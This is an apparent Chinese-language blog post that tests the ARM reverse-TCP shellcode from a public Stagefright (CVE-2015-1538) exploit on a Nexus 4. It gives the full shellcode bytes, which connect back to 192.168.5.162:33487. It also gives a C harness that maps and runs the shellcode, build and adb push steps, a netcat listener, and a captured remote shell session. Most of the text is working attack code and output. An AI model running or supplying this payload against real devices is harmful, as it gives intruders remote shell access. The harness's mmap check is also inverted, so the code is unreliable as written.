最近想看一下https://github.com/jduck/cve-2015-1538-1/blob/master/Stagefright_CVE-2015-1538-1_Exploit.py 中的shell reverse tcp在Nexus4 @ android-5.1.1_r19上能否正常工作。
相关的测试代码请看这里:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/mman.h>
const unsigned char payload[] =
// # linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)
// # fork
"\x02\x70\xa0\xe3"
"\x00\x00\x00\xef"
// # continue if not parent...
"\x00\x00\x50\xe3"
"\x02\x00\x00\x0a"
// # exit parent
"\x00\x00\xa0\xe3"
"\x01\x70\xa0\xe3"
"\x00\x00\x00\xef"
// # setsid in child
"\x42\x70\xa0\xe3"
"\x00\x00\x00\xef"
// # socket/connect/dup2/dup2/dup2
"\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c"
"\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60"
"\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0"
"\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1"
"\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06"
"\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00"
"\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0"
"\xe3\x00\x00\x00\xef"
// # execve(shell, argv, env)
"\x30\x00\x8f\xe2\x04\x40\x24\xe0"
"\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d"
"\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00"
"\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00"
"\xef\x02\x00"
// # Add the connect back host/port 192.168.5.162:33487
"\x82\xcf" "\xc0\xa8\x05\xa2"
// # shell -
"/system/bin/sh\x00\x00"
// # argv -
"sh\x00\x00"
// # env -
"PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00";
int main(int argc, char *argv[])
{
char *a = mmap(0, sizeof(payload), PROT_EXEC | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1,0);
if (a != (char *)MAP_FAILED) {
printf("Failed to mmap playload memory %d(%s)!\n", errno, strerror(errno));
return 0;
}
memcpy(a, payload, sizeof(payload));
((void (*)(void))a)();
return 0;
}
NOTE: 默认的IP地址与端口号为:192.168.5.162:33487
相关的Android.mk文件:
LOCAL_PATH:= $(call my-dir) include $(CLEAR_VARS) LOCAL_MODULE_TAGS := optional LOCAL_MODULE := shellrevtcp LOCAL_SRC_FILES:= \ shell_reverse_tcp.c LOCAL_CFLAGS := -Wno-unused-parameter include $(BUILD_EXECUTABLE)
编译完后将shellrevtcp push到手机中:
$ adb push ${OUT}/system/bin/shellrevtcp /data/local/tmp/
在IP地址为192.168.5.162的主机终端上执行:
hzak@B85RPI:/data/mako-5.1.1_r19/system/shellrevtcp$ nc -l 33487 -v Listening on [0.0.0.0] (family 0, port 33487)
之后在adb shell 中执行/data/local/tmp/shellrevtcp(需要先执行adb shell,直接执行adb shell /data/local/tmp/shellrevtcp命令会失败)就可以通过之前使用的终端中执行shell命令,如:
hzak@B85RPI:/data/mako-5.1.1_r19/system/shellrevtcp$ nc -l 33487 -v
Listening on [0.0.0.0] (family 0, port 33487)
Connection from [192.168.5.141] port 33487 [tcp/*] accepted (family 2, sport 58808)
ls -l
__bionic_open_tzdata_path: ANDROID_ROOT not set!
__bionic_open_tzdata_path: ANDROID_ROOT not set!
__bionic_open_tzdata_path: ANDROID_ROOT not set!
drwxr-xr-x root root 2016-06-10 13:38 acct
drwxrwx--- system cache 2016-03-08 03:52 cache
lrwxrwxrwx root root 1970-01-01 00:00 charger -> /sbin/healthd
dr-x------ root root 2016-06-10 13:38 config
lrwxrwxrwx root root 2016-06-10 13:38 d -> /sys/kernel/debug
drwxrwx--x system system 2016-06-10 13:46 data
-rw-r--r-- root root 329 1970-01-01 00:00 default.prop
drwxr-xr-x root root 2016-06-10 13:39 dev
lrwxrwxrwx root root 2016-06-10 13:38 etc -> /system/etc
...
相关的参考文档:
- https://blog.zimperium.com/the-latest-on-stagefright-cve-2015-1538-exploit-is-now-available-for-testing-purposes/
- https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb
- https://github.com/jduck/cve-2015-1538-1/blob/master/Stagefright_CVE-2015-1538-1_Exploit.py
- https://www.blackhat.com/docs/us-15/materials/us-15-Drake-Stagefright-Scary-Code-In-The-Heart-Of-Android.pdf
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1538
- http://googleprojectzero.blogspot.com/2015/09/stagefrightened.html